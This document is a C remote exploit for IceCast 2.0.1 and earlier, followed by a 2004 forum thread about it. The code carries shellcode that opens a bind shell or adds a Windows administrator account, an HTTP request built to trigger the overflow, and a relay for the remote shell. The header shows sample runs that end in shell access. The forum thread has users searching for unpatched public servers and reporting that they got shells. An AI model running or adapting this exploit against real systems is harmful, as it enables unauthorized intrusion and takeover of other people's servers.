/**
** IceCast <= 2.0.1 Exploit v1.1
** Fix Exploit by cyrex
** ------------------------------
**
** Now Working Version:
**
** C:\>icecast
** *****************************************
** ** - IceCast <= 2.0.1 Remote Exploit -
** ** - by cyrex -
** ** --> usage: (null) <parm>
** ** ->> -h <hostname>
** ** ->> -p <port>
** ** ->> -b <bindport for BindShell>
** ** ->> -t <type>
** ** ->> 1 = Add's a user Name=icecast Pass:(filtered)
** ** ->> 2 = Binds a Shell on a Port
**
** C:\>
**
** C:\>icecast -h 127.0.0.1 -p 1024 -b 2004 -t 2
** [*] Resolved Host (127.0.0.1)
** [*] Connecting to Target="127.0.0.1" on port "1024"
** [*] Connected. Generate Exploit
** [*] Done. Sending now the Evil Buffer
** [*] Connecting now to BindShell...
** [*] We are in
** Microsoft Windows XP [Version 5.1.2600]
** (C) Copyright 1985-2001 Microsoft Corp.
**
** C:\Programm Files\IceCast2>
**
** C:\>icecast -h 192.168.1.5 -p 1024 -b 2004 -t 1
** [*] Resolved Host (192.168.1.5)
** [*] Connecting to Target="192.168.1.5" on port "1024"
** [*] Connected. Generate User
** [*] Done. Sending now the Evil Buffer
** [*] User should now be added. Try to use psexec
**
** C:\>net user
**
** Benutzerkonten für \\CYREX
**
** --------------------------------------------------------------------
** Administrator cyrex1 Gast
** Hilfeassistent icecast <-- CREATED SUPPORT_388945a0
** Der Befehl wurde erfolgreich ausgeführt.
**
**
** C:\>
**
** C:\>psexec \\127.0.0.1 -u icecast -p (filtered) cmd.exe
**
** PsExec v1.55 - Execute processes remotely
** Copyright (C) 2001-2004 Mark Russinovich
** Sysinternals - www.sysinternals.com
**
**
** Microsoft Windows XP [Version 5.1.2600]
** (C) Copyright 1985-2001 Microsoft Corp.
**
** C:\WINDOWS\system32>exit
** cmd.exe exited on 127.0.0.1 with error code 0.
**
** C:\>
**
**
**/
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>
/*
 * Payload bytes and HTTP request fragments that main() splices together into
 * a single request: req1 + Decoder + Encode(payload) + req2.
 *
 * shellcode: x86 machine code for mode "-t 2", a bind shell.  Bytes 236-237
 * hold the TCP listen port in network byte order (0x11 0x5c = 4444 in the
 * string below) and are overwritten by main() with htons(BindPort) through
 * BINDSHELL_OFFSET before encoding.  The embedded bytes "\x43\x4d\x44\x00"
 * spell "CMD", presumably the program the listener hands to the connecting
 * client.  Detection: an unexpected TCP listener (default 4444) appearing on
 * the IceCast host right after a malformed request.
 */
unsigned char shellcode[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\x5c\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d"
"\x7c\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24"
"\x10\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24"
"\x4c\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51"
"\x49\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04"
"\xff\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89"
"\xc3\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff"
"\x55\x04\x31\xdb\x53\xff\xd0";
/*
 * user_shellcode: x86 machine code for mode "-t 1".  The trailing bytes
 * (from "\x63\x6d\x64..." onward) are the ASCII command line
 * "cmd.exe /c net user icecast <password> /ADD && net localgroup
 * Administrators icecast /ADD"; the password is spelled out in the byte
 * string even though the usage text calls it filtered.  Detection: a new
 * local account named "icecast" added to the Administrators group on the
 * IceCast host (Windows event log, net user output).
 */
unsigned char user_shellcode[]=
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x69\x63\x65"
"\x63\x61\x73\x74\x20\x66\x75\x63\x6b\x65\x64\x20\x2f\x41\x44\x44"
"\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72"
"\x73\x20\x69\x63\x65\x63\x61\x73\x74\x20\x2f\x41\x44\x44\x00";
/*
 * req1: the start of the HTTP request.  The request line is "GET / HTTP/ 1.0"
 * (note the stray space after "HTTP/") and is followed by 31 one-character
 * header lines "a\r\n".  Detection: a request line with that malformed
 * version token, or dozens of one-byte header lines, is not something a
 * real client sends.
 */
unsigned char req1[] =
"GET / HTTP/ 1.0\r\n"
"a\r\na\r\na\r\na\r\na\r\na\r\na\r\na\r\n"
"a\r\na\r\na\r\na\r\na\r\na\r\na\r\na\r\n"
"a\r\na\r\na\r\na\r\na\r\na\r\na\r\na\r\n"
"a\r\na\r\na\r\na\r\na\r\na\r\na\r\n";
/* req2: the blank line that terminates the HTTP header block. */
unsigned char req2[] =
"\r\n\r\n";
/*
 * Decoder: x86 stub placed between req1 and the encoded payload.  Judging
 * from Encode() below it presumably reverses that encoding on the target:
 * each payload byte was turned into two characters, 'A' + low nibble then
 * 'A' + high nibble, so the encoded payload consists solely of 'A'..'P'.
 * Detection: a long run of only the letters A-P following binary bytes in
 * the header area of a request.
 */
unsigned char Decoder[] =
"\x60\xeb\x03\x5b\x53\xc3\xe8\xf8\xff\xff\xff\x31\xc0\x04\x34\x01"
"\xd8\x50\x5b\x31\xd2\x02\x10\x40\x02\x30\x40\x50\x31\xc0\x04\x41"
"\x28\xc2\x28\xc6\xc0\xe2\x04\x66\xc1\xea\x04\x31\xc0\x30\xf6\x02"
"\x03\x28\x03\x66\x01\x13\x43\x58\x31\xc9\x02\x08\xe0\xd5\x61";
/* Byte offset in shellcode[] of the 16-bit listen port that main() patches. */
#define BINDSHELL_OFFSET 236
/* Seconds the timeout() helper waits in select() for a readable descriptor. */
#define TIMEOUT 3
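/*
 * Print the command-line help to stdout.
 *
 * p: program name as given in argv[0]; printed in the usage line.  A NULL
 *    pointer is printed as "(null)" instead of being passed to printf("%s"),
 *    which is undefined behaviour (the header transcript shows this case).
 * Returns 0.  The original was declared int but fell off the end of the
 * function, which is undefined behaviour if the value were ever read.
 */
int usage(const char *p)
{
    const char *name = p ? p : "(null)";

    puts("*****************************************");
    puts("** - IceCast <= 2.0.1 Remote Exploit -");
    puts("** - by cyrex@EFNet -");
    printf("** --> usage: %s <parm>\n", name);
    puts("** ->> -h <hostname>");
    puts("** ->> -p <port>");
    puts("** ->> -b <bindport for BindShell>");
    puts("** ->> -t <type>");
    puts("** ->> 1 = Add's a user Name=icecast Pass:(filtered)");
    puts("** ->> 2 = Binds a Shell on a Port");
    return 0;
}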
/*
 * Write as much of buf[0..*len) to fd as the kernel accepts and shift any
 * remainder to the front of buf.  Returns -1 if write() failed, else 0.
 */
static int sh_flush(int fd, char *buf, int *len)
{
    int done = write(fd, buf, *len);
    if (done == -1)
        return -1;
    if (done == *len) {
        *len = 0;
    } else {
        *len -= done;
        memmove(buf, buf + done, *len);
    }
    return 0;
}

/*
 * Relay bytes in both directions between a local descriptor pair and a
 * socket: whatever arrives on `in` is written to `s`, whatever arrives on
 * `s` is written to `out`.  Each direction is buffered in 128 bytes and a
 * full buffer stops further reads on that side until it drains.
 *
 * Returns  0 if select() failed or the socket side closed or errored,
 *         -2 if read(in) failed,
 *         -3 if `in` reached end of file.
 */
int sh (int in, int out, int s)
{
    enum { RELAY_BUF = 128 };
    char to_sock[RELAY_BUF], to_out[RELAY_BUF];
    int to_sock_len = 0, to_out_len = 0;
    int status = 0;

    /* select() wants one past the highest descriptor it must watch. */
    int nfds = in;
    if (out > nfds)
        nfds = out;
    if (s > nfds)
        nfds = s;
    nfds++;

    for (;;) {
        fd_set readable, writable;
        FD_ZERO(&readable);
        FD_ZERO(&writable);
        if (to_out_len < RELAY_BUF)
            FD_SET(s, &readable);
        if (to_sock_len < RELAY_BUF)
            FD_SET(in, &readable);
        if (to_sock_len)
            FD_SET(s, &writable);
        if (to_out_len)
            FD_SET(out, &writable);

        int pending = select(nfds, &readable, &writable, NULL, NULL);
        if (pending == -1)
            break;

        /* Each branch consumes one ready descriptor; once all are handled
         * we go straight back to select() instead of testing the rest. */
        if (FD_ISSET(in, &readable)) {
            int got = read(in, to_sock + to_sock_len, RELAY_BUF - to_sock_len);
            if (got == -1) {
                status = -2;
                break;
            }
            if (got == 0) {
                status = -3;
                break;
            }
            to_sock_len += got;
            if (--pending == 0)
                continue;
        }
        if (FD_ISSET(s, &writable)) {
            if (sh_flush(s, to_sock, &to_sock_len) < 0)
                break;
            if (--pending == 0)
                continue;
        }
        if (FD_ISSET(s, &readable)) {
            int got = read(s, to_out + to_out_len, RELAY_BUF - to_out_len);
            if (got <= 0)
                break;
            to_out_len += got;
            if (--pending == 0)
                continue;
        }
        if (FD_ISSET(out, &writable)) {
            if (sh_flush(out, to_out, &to_out_len) < 0)
                break;
        }
    }
    return status;
}
/*
 * Entry point.  Parses -h host, -p port, -b bindport and -t type, connects
 * to host:port and sends one HTTP request assembled from
 * req1 + Decoder + Encode(payload) + req2.  Type 2 (x == 0) sends the
 * bind-shell payload and, after a 5 s pause, connects back to BindPort and
 * relays the terminal through sh().  Type 1 (x == 1) sends the add-user
 * payload and exits.
 *
 * NOTE(review): defects present in the code as found, left unchanged here:
 *  - hostname, port, BindPort and x are never initialised; an omitted option
 *    (or -t with a value other than "1"/"2") leaves them indeterminate.
 *  - Encode() and new_tcpConnect() are defined later in this file with no
 *    prototype, so their calls below rely on implicit declarations.
 *  - Encode() writes exactly 2*len bytes and no terminator, so the strcat()
 *    of encodeshell reads past the end of the malloc'd block.
 *  - send() reports failure as -1, not 0, so `if(!d)` never fires on error.
 *  - evilbuff is u_char but passed to strcpy/strcat/strlen without a cast.
 */
int main(int argc, char *argv[])
{
struct hostent *he;
struct sockaddr_in client;
int c,
port,
fd,
d,
x,
ret;
int BindPort;
char *hostname;
unsigned char* encodeshell;
/* Fixed-size request buffer; req1 + Decoder + 2*payload + req2 is well
 * under 2000 bytes for both payloads above. */
u_char evilbuff[2000];
/* Three options with values plus the program name is a minimum of 7
 * arguments, so this check lets a run with one option missing through. */
if (argc < 6) {
usage (argv[0]);
return -1;
}
while((c = getopt(argc, argv, "h:p:b:t:")) != EOF) {
switch(c) {
case 'h':
hostname=strdup(optarg);
break;
case 'p':
port=atoi(optarg);
break;
case 'b':
BindPort=atoi(optarg);
break;
case 't':
/* "1" = add user (x=1), "2" = bind shell (x=0); anything else leaves x
 * untouched, i.e. uninitialised. */
if(!strcmp(optarg,"1")) {
x=1;
}
if(!strcmp(optarg,"2")) {
x=0;
}
break;
default:
usage (argv[0]);
return 0;
}
}
if((he=gethostbyname(hostname))==NULL)
{
printf("[-] Error: (Resolving Host)\n");
exit(-1);
}
printf("[*] Resolved Host (%s)\n",hostname);
printf("[*] Connecting to Target=\"%s\" on port \"%d\"\n",hostname,port);
if((fd=socket(AF_INET,SOCK_STREAM,0))==-1){
printf("[-] Error: Socket Creation\n");
exit(-1);
}
client.sin_family = AF_INET;
client.sin_port = htons(port);
/* h_addr is the BSD/glibc convenience alias for h_addr_list[0]; sin_zero
 * is never cleared, so the struct is passed with indeterminate padding. */
client.sin_addr = *((struct in_addr *)he->h_addr);
if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
printf("[-] Error: Can't Connect to %s\n",hostname);
exit(-1);
}
/* Bind-shell mode. */
if(!x) {
printf("[*] Connected. Generate Exploit\n");
/* Room for two characters per payload byte plus a terminator that
 * Encode() never writes; the malloc() result is not checked. */
encodeshell = (unsigned char*)malloc( ( sizeof(shellcode) - 1 ) * 2 + 1 );
/* Patch the listen port into the payload before encoding it (see the
 * comment on shellcode[]). */
*(unsigned short*)&shellcode[BINDSHELL_OFFSET] = htons(BindPort);
Encode( shellcode, sizeof(shellcode) - 1, encodeshell );
/* On the wire: malformed request line, 31 "a" header lines, the raw
 * decoder stub, a run of 'A'..'P' characters, then CRLF CRLF. */
strcpy(evilbuff,(char*)req1);
strcat(evilbuff,(char*)Decoder);
strcat(evilbuff,(char*)encodeshell);
strcat(evilbuff,(char*)req2);
printf("[*] Done. Sending now the Evil Buffer\n");
d=send(fd,evilbuff,strlen(evilbuff),0);
if(!d)
{
printf("[-] Error: Sending Evil Buffer\n");
exit(-1);
}
printf("[*] Connecting now to BindShell...\n");
/* Presumably gives the payload time to open its listener; the connect-back
 * to BindPort follows, a second inbound connection a few seconds after
 * the malformed request. */
sleep(5);
if ((ret = new_tcpConnect (hostname, BindPort, 2000)) < 0) {
printf("[-] Couldnt connect to bindshell, possible reasons:\n");
printf(" 1: Host is firewalled\n");
printf(" 2: Exploit failed\n");
goto out;
}
printf ("[*] We are in\n");
/* Relay stdin/stdout to the remote shell until either side closes. */
sh (0, 1, ret);
out:
/* ret is negative on the failure path, so this close() fails with EBADF. */
close (ret);
return 0;
}
/* Add-user mode. */
if(x) {
printf("[*] Connected. Generate User\n");
/* Same allocation/termination caveat as in the bind-shell branch. */
encodeshell = (unsigned char*)malloc( ( sizeof(user_shellcode) - 1 ) * 2 + 1 );
Encode( user_shellcode, sizeof(user_shellcode) - 1, encodeshell );
strcpy(evilbuff,(char*)req1);
strcat(evilbuff,(char*)Decoder);
strcat(evilbuff,(char*)encodeshell);
strcat(evilbuff,(char*)req2);
printf("[*] Done. Sending now the Evil Buffer\n");
/* Unlike the other branch the pause comes before the send here. */
sleep(5);
d=send(fd,evilbuff,strlen(evilbuff),0);
if(!d)
{
printf("[-] Error: Sending Evil Buffer\n");
exit(-1);
}
printf("[*] User should now be added. Try to use psexec\n");
/* Exits with status -1 (255) even though this is the success path. */
exit(-1);
}
}
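/*
 * Encode nLen bytes of pszIn as printable text: each input byte becomes two
 * output characters, 'A' + low nibble followed by 'A' + high nibble, so the
 * output consists solely of the letters 'A'..'P'.
 *
 * pszIn:  input bytes (nLen of them).
 * nLen:   number of input bytes; 0 writes nothing.
 * pszOut: receives exactly 2*nLen bytes.  The output is NOT NUL-terminated;
 *         the caller must size pszOut for 2*nLen bytes and terminate it
 *         itself if it is to be used as a C string.
 * Returns 0.  The original was declared int but never returned a value,
 * which is undefined behaviour if the result were used.
 */
int Encode( const unsigned char* pszIn, unsigned int nLen, unsigned char* pszOut )
{
    for (unsigned int n = 0; n < nLen; n++) {
        /* unsigned nibbles: the original used plain char, whose signedness is
         * implementation-defined. */
        unsigned char lo = pszIn[n] & 0x0f;
        unsigned char hi = (pszIn[n] >> 4) & 0x0f;
        pszOut[2 * n]     = (unsigned char)('A' + lo);
        pszOut[2 * n + 1] = (unsigned char)('A' + hi);
    }
    return 0;
}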
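/*
 * Wait up to TIMEOUT seconds for fd to become readable.
 *
 * fd: descriptor to watch; must be a valid descriptor below FD_SETSIZE.
 * Returns 0 if fd is readable within the window, -1 on timeout or if
 * select() itself fails.  The original returned 0 on a select() error and so
 * reported a failed wait as "ready".
 */
int timeout(int fd) {
    struct timeval tout = { .tv_sec = TIMEOUT, .tv_usec = 0 };
    fd_set fd_read;

    FD_ZERO(&fd_read);
    FD_SET(fd, &fd_read);
    int err = select(fd + 1, &fd_read, NULL, NULL, &tout);
    return err <= 0 ? -1 : 0;
}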
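/*
 * Open a blocking TCP connection to host:port, bounding the connect() wait.
 *
 * host:       hostname or dotted-quad, resolved with gethostbyname().
 * port:       TCP port in host byte order.
 * timeout_ms: connect timeout in milliseconds.  The original stored the
 *             millisecond remainder directly in tv_usec, so the sub-second
 *             part of the timeout was 1000 times too short.
 * Returns a connected descriptor with TCP_NODELAY set and blocking mode
 * restored, or -1 on any failure with errno describing the cause (for a
 * refused or failed connect this is the pending SO_ERROR; for a timeout it
 * is ETIMEDOUT).  Error messages no longer carry a trailing "\n", which made
 * perror() print a stray empty line, and the resolver failure no longer
 * goes through perror(), since gethostbyname() does not set errno.
 */
int new_tcpConnect (const char *host, unsigned int port, unsigned int timeout_ms)
{
    struct hostent *hp = gethostbyname(host);
    if (hp == NULL) {
        fputs("tcpConnect:gethostbyname: cannot resolve host\n", stderr);
        return -1;
    }

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("tcpConnect:socket");
        return -1;
    }

    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_port = htons((unsigned short)port);
    /* h_addr_list[0] rather than the h_addr alias, which glibc only exposes
     * under its non-strict feature macros. */
    memcpy(&addr.sin_addr, hp->h_addr_list[0], sizeof addr.sin_addr);

    /* Non-blocking so connect() returns at once and select() bounds the wait. */
    int flag = fcntl(sock, F_GETFL);
    if (flag == -1) {
        perror("tcpConnect:fcntl");
        goto fail;
    }
    if (fcntl(sock, F_SETFL, flag | O_NONBLOCK) < 0) {
        perror("tcpConnect:fcntl");
        goto fail;
    }

    if (connect(sock, (const struct sockaddr *)&addr, sizeof addr) < 0 &&
        errno != EINPROGRESS) {
        perror("tcpConnect:connect");
        goto fail;
    }

    struct timeval tv;
    tv.tv_sec = timeout_ms / 1000;
    tv.tv_usec = (timeout_ms % 1000) * 1000;

    /* A non-blocking connect completes when the socket becomes writable
     * (or readable on error); watch both sets. */
    fd_set rset, wset;
    FD_ZERO(&rset);
    FD_SET(sock, &rset);
    wset = rset;
    int ready = select(sock + 1, &rset, &wset, NULL, &tv);
    if (ready == 0)
        errno = ETIMEDOUT;
    if (ready <= 0)
        goto fail;

    /* The connect result is delivered through SO_ERROR. */
    int pending = 0;
    socklen_t pending_len = sizeof pending;
    if (getsockopt(sock, SOL_SOCKET, SO_ERROR, &pending, &pending_len) < 0) {
        perror("tcpConnect:getsockopt");
        goto fail;
    }
    if (pending != 0) {
        errno = pending;
        goto fail;
    }

    if (fcntl(sock, F_SETFL, flag & ~O_NONBLOCK) < 0) {
        perror("tcpConnect:fcntl");
        goto fail;
    }

    int on = 1;
    if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, &on, sizeof on) < 0) {
        perror("tcpConnect:setsockopt");
        goto fail;
    }
    return sock;

fail:
    {
        /* close() may overwrite the errno the caller wants to see. */
        int saved = errno;
        close(sock);
        errno = saved;
    }
    return -1;
}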
Icecast Remote Buffer Overflow By Agathos
#1
Posted 02 October 2004 - 05:05 PM
#2
Posted 02 October 2004 - 10:18 PM
----
edit://
weird .. found a Icecast 2.0.0 server .. tried the exploit on it ... didnt work
#3
Posted 02 October 2004 - 10:27 PM
Thanks man
#4
Posted 03 October 2004 - 12:53 AM
#5
Posted 03 October 2004 - 03:52 AM
Maybe a stupid question, but how does that thing know what my IP is to put the bindshell on... shouldn't there be an option to put in your IP for the bindshell?
- sorry never mind
#6
Posted 03 October 2004 - 08:17 AM
Microsoft Windows XP [version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
I got a shell (I downloaded Icecast 2.0.1, installed it, then tested the exploit, Agathos).
This version adds a bind shell and can add a user with a password.
good job
#7
Posted 03 October 2004 - 10:50 AM
#8
Posted 03 October 2004 - 10:55 AM
click server dir thing
#9
Posted 03 October 2004 - 12:02 PM
I may hope at least
#10
Posted 03 October 2004 - 02:56 PM
i guess servers wich are on that list are all updated allready
I may hope at least
dont think so .. found some icecast servs running 2.0.0
#11
Posted 04 October 2004 - 04:57 AM
i guess servers wich are on that list are all updated allready
I may hope at least
dont think so .. found some icecast servs running 2.0.0
i check on google server icecast (on the site icecast.org already aptched) i didnt find it hard to find a server on version 2.0.0
#12
Posted 04 October 2004 - 06:42 AM
icecast -h *** -p 9200 -b -t 1
dont get a shell but it does say this.
done. Sending now the evil buffer
user should be added now. Try to use psexec
??
edit:
Nevermind, got a shell now
#13
Posted 04 October 2004 - 07:13 AM
i guess servers wich are on that list are all updated allready
I may hope at least
dont think so .. found some icecast servs running 2.0.0
i check on google server icecast (on the site icecast.org already aptched) i didnt find it hard to find a server on version 2.0.0
truly, it's nit hard to find....but its hard to find a Windows server with icecast
#14
Posted 04 October 2004 - 09:49 AM
Thx a lot
#15
Posted 05 October 2004 - 11:42 AM